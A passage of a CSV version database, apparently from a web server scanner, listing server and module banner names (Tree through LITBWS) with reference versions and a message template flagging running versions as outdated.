@CURRENT_VER)\"\n\"600799\",\"Tree/\",\"8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600800\",\"TSM_HTTP/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600801\",\"TTP/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600802\",\"TUX/\",\"2.0 (Linux)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600803\",\"TuxSQLConf/\",\"20070207-00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600804\",\"TuxTrafficLogRotate/\",\"20051209-00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600805\",\"Ubicom/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600806\",\"UcoZXSrv/\",\"1.4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600807\",\"UHTTPServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600808\",\"Ultraseek/\",\"5.8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600809\",\"UNIT_Homepage/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600810\",\"UnrealEngine UWeb Web Server Build \",\"436\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600811\",\"UPS_Server/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600812\",\"UserLand Frontier/\",\"9.0-WinNT\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600813\",\"UserWeb/\",\"v2.65\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600814\",\"uWS/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600815\",\"v.ii/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600816\",\"v2h/\",\"1.5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600817\",\"VCNET2-Server/\",\"1.03\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600818\",\"VDB/\",\"1.1.1-se\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600819\",\"Vernier/\",\"5.2.0.63\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600820\",\"vhostdb/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600821\",\"Viking/\",\"1.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600822\",\"Virata-EmWeb/\",\"R6_2_1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600823\",\"VIRTUAL/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600824\",\"VisiBroker/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600825\",\"VisualPulse (tm) \",\"3.0c\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600826\",\"Vivasoft/\",\"8.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600827\",\"VM_ESA/\",\"2.3.0.9902\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600828\",\"VM:Secure/\",\"2.5A\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600829\",\"VM:Webgateway/\",\"03.1A\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600830\",\"Vorlon SR \",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600831\",\"Vortech_PHP/\",\"0.1.0-p0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600832\",\"vqServer/\",\"vqServer/1.9.55\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600833\",\"w/CBS::adtag/\",\"1.0a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600834\",\"w/CBS::gettxt/\",\"1.0a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600835\",\"WC/\",\"3000\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600836\",\"WDaemon/\",\"10.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Versions lower than 4 have serious vulnerabilities.\"\n\"600837\",\"Web Crossing/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600838\",\"Web Sphere Application Server/\",\"5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600839\",\"Web Transaction Server For ClearPath MCP \",\"6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600840\",\"Web_Server_4D/\",\"3.6.1b8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600841\",\"Web-Server/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600842\",\"WEB602/\",\"1.04\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600843\",\"WebAuth/\",\"3.7.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600844\",\"WebBase 4.5 build \",\"69\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600845\",\"WebCo/\",\"Build9708-2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600846\",\"WebCollage-Syndicator/\",\"3.2.4.4040\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600847\",\"WebCompanion/\",\"6.0v1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600848\",\"webfs/\",\"1.21\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600849\",\"weBLink/\",\"0.3.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600850\",\"WebLogic \",\"5.1.0 Service Pack 9 04/06/2001 12:48:33 #105983\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600851\",\"WebLogic WebLogic Server \",\"7.0 SP2  Sun Jan 26 23:09:32 PST 2003 234192\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600852\",\"WebLogic WebLogic Temporary Patch \",\"5 for PeopleSoft\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600853\",\"WebLogic WebLogic Temporary Patch for \",\"CR067505 02/12/2002 17:10:21\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600854\",\"WebLogic/\",\"7.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600855\",\"WebOTX_Web_Server/\",\"1.3.36\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600856\",\"WEBrick/\",\"1.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600857\",\"WebSEAL/\",\"7.0.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600858\",\"Webserver/\",\"2.71828183\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600859\",\"Webshare/\",\"1.2.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600860\",\"WebSiphon/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600861\",\"WebSite/\",\"3.5.19\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600862\",\"WebsiteFactory/\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600863\",\"WebSitePro/\",\"3.1.13.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600864\",\"Websphere/\",\"4.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600865\",\"WebSphereApplicationServer/\",\"8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600866\",\"WebSrv/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600867\",\"WebSTAR/\",\"4.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600868\",\"WebTen/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600869\",\"WebtoB/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600870\",\"WebTopia/\",\"2.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600871\",\"WebTV/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600872\",\"WebTwist/\",\"3.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600873\",\"WebWhois/\",\"2.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600874\",\"WebZerver/\",\"V06.04\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600875\",\"wg_httpd/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600876\",\"WhatsUp_Gold/\",\"8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600877\",\"whostmgr/\",\"whostmgr/3.9.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600878\",\"Wind Manage/\",\"4.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600879\",\"WindManage/\",\"4.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600880\",\"Windows-IIS/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600881\",\"WindWeb/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600882\",\"WISE_Homepage/\",\"1.0.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600883\",\"WN/\",\"2.4.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600884\",\"Worldgroup/\",\"3.30\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600885\",\"WSGIServer/\",\"0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600886\",\"wti-httpd/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600887\",\"WWW Server/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600888\",\"WWWServer/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600889\",\"WYM/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600890\",\"X-IVO/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600891\",\"Xauth/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600892\",\"Xeneo/\",\"2.2.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600893\",\"Xerox_MicroServer/\",\"Xerox11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600894\",\"Xerver/\",\"4.03\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600895\",\"Xgate/\",\"3.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600896\",\"Xitami web server \",\"v2.4c0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600897\",\"xs-httpd/\",\"3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600898\",\"XunleiHttpServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600899\",\"Y.G.Apache-SSLv3/\",\"1.3.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600900\",\"yasl/\",\"2.25\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600901\",\"YAWN/\",\"1.05\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600902\",\"Yaws/\",\"2.49.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600903\",\"z_VM/\",\"4.4.0.0000\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600904\",\"Zend-LaunchPad/\",\"1.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600906\",\"Zope/\",\"Zope/2.13.29\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600907\",\"ZOT-PS-15/\",\"6.8.0104\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600908\",\"ZOT-PS-30/\",\"8.2.0004\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600909\",\"ZServer/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600910\",\"ZyXEL-RomPager/\",\"ZyXEL-RomPager/3.02\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600911\",\"SAF/\",\"4.0rc1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600912\",\"Twisted/\",\"13.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600913\",\"Plone/\",\"3.3.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600914\",\"CovalentSNMP/\",\"3.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600915\",\"Snap Appliance, Inc./\",\"4.0.860\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600916\",\"CJServer/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600917\",\"Devshed/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600918\",\"mod_bla_bla_bla/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600919\",\"G4200.GSI/\",\"2.22.0131\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600920\",\"KONICHIWA/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600921\",\"CatWalk/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600922\",\"CERNhttpd/\",\"3.0.A(Unix)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600923\",\"mod_transform/\",\"0.6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600924\",\"mod_auth_ianus_sso/\",\"1.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600925\",\"LANDeskManagementAgent/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600926\",\"WebKnight/\",\"2.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600927\",\"AOLServer/\",\"4.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600928\",\"SE/\",\"0.5.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600929\",\"Sun-Java-System-Web-Proxy-Server/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600931\",\"iSpit/\",\"1.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600932\",\"Phusion_Passenger/\",\"6.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600933\",\"Sun Java System Application Server \",\"9.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600934\",\"tinyproxy/\",\"1.6.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600935\",\"ntop/\",\"3.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600936\",\"Mono.WebServer2/\",\"0.2.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600937\",\"mod_log_online/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600938\",\"mod_apreq2-20050712/\",\"2.1.3-dev\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600939\",\"JSF/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600940\",\"HTTPGW/\",\"1.1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600941\",\"AAISP/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600942\",\"AppleIDiskServer-\",\"1G301009\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600943\",\"Apusic/\",\"4.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600944\",\"cheyenne/\",\"2.2.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600945\",\"GlobalSCAPE-EFTServer/\",\"6.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600946\",\"GlobalSCAPE-SecureServer/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600947\",\"InteSoft-ASPAccelerator/\",\"3.7.5000.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600948\",\"iPyramid.system2/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600949\",\"MailEnable-HTTP/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600950\",\"mod_copstng/\",\"2.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600951\",\"mod_ddmh/\",\"0.0.16\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600952\",\"mod_defer/\",\"0.1.lk\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600953\",\"mod_dp20/\",\"0.99.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600954\",\"mod_gnutls/\",\"0.5.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600955\",\"mod_lisp2/\",\"1.3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600956\",\"mod_top/\",\"2.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600957\",\"mod_vhost_online/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600958\",\"ModemNV3/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600959\",\"Simple-Server/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600960\",\"TinyHTTPProxy/\",\"0.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600962\",\"WebMail/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600963\",\"WWW-KODEKS/\",\"4.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600964\",\"YTS/\",\"1.20.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600965\",\"OpenCms/\",\"7.5.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600966\",\"Mbedthis-AppWeb/\",\"2.4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600967\",\"WebProxy/\",\"5.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600968\",\"MicrosoftIIS/\",\".6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600969\",\"Cherokee/\",\"1.2.104\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600970\",\"debut/\",\"1.08\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600971\",\"DnionOS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600972\",\"FAV-WebSRV/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600973\",\"gorgona/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600974\",\"HASPLM/\",\"13.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600975\",\"IntotoHttpServer//\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600976\",\"ISS/\",\"7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600977\",\"LotusExpeditorWebContainer/\",\"6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600978\",\"mod_fcgid/\",\"2.3.10-dev\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600979\",\"mod_scgi_pubsub/\",\"1.11-pubsub\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600980\",\"mod_vhs/\",\"1.0.32\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600981\",\"PowerBoutique/\",\"2.2.3/10.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600982\",\"RemotelyAnywhere/\",\"8.0.668\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600983\",\"SERMEPAServer/\",\"0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600984\",\"TongWeb-Director/\",\"4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600985\",\"uServ/\",\"1.5.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600986\",\"AdventAPAuthS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600987\",\"CPLIMS/\",\"3.0.8.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600988\",\"HDSHi-TrackServer/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600989\",\"JuniperNetworksNitroCache/v\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600990\",\"MochiWeb/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600991\",\"SWS/\",\"3.10.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600992\",\"bit_asic/\",\"3.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600993\",\"ASERVER/\",\"1.0.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600994\",\"BarracudaHTTP2.0/\",\"2.2.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600995\",\"HZV/\",\"2009\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600996\",\"HintSoftWS/\",\"1.0.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600998\",\"LiveWorld/\",\"cc_2_048\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600999\",\"NIServiceLocator/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601000\",\"PowerHomeWebserver/\",\"2.1b\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601001\",\"Seminole/\",\"2.64\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601002\",\"Serv-U/\",\"11.3.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601003\",\"SiemensGigaset-Server/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601004\",\"TWebAP/\",\"2.1.2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601005\",\"TornadoServer/\",\"2.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601006\",\"W3MFC/\",\"1.68\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601007\",\"WebROaR-\",\"0.3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601008\",\"WingFTPServer/\",\"3.5.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601009\",\"afts/\",\"0.9.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601010\",\"corehttp-\",\"0.5.3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601011\",\"dhttpd/\",\"1.02a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601012\",\"gSOAP/\",\"2.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601013\",\"mod_apreq2-20051231/\",\"2.6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601014\",\"mod_flog/\",\"0.4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601015\",\"mod_hcgi/\",\"0.9.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601016\",\"mod_musicindex/\",\"1.2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601017\",\"mod_ort/\",\"1.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601018\",\"mod_qos_control/\",\"7.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601020\",\"sw-cp-server/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601021\",\"Oracle-iPlanet-Web-Server/\",\"7.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601022\",\"CVOS/\",\"3.9.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601023\",\"Zeus/\",\"6_0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601024\",\"mod_lo/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601025\",\"mod_ruid2/\",\"0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601026\",\"mod_cluster/\",\"1.3.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601027\",\"mod_aspdotnet/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601028\",\"mod_antiloris/\",\"0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601029\",\"PRTG/\",\"9.1.3.1792\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601030\",\"DMCRUIS/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601031\",\"Easy-WebServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601032\",\"EdgePrism/\",\"4.0.10.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601033\",\"FlashCom/\",\"3.5.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601034\",\"sqlmap/\",\"1.1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601035\",\"IOSFirewallHTTP/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601036\",\"IPG/\",\"7000\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601037\",\"KWS/\",\"2009\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601038\",\"KWS2009/\",\"12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601039\",\"junction/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601040\",\"LITBWS/\",\"1.0.10\",\"@RUNNING_VER 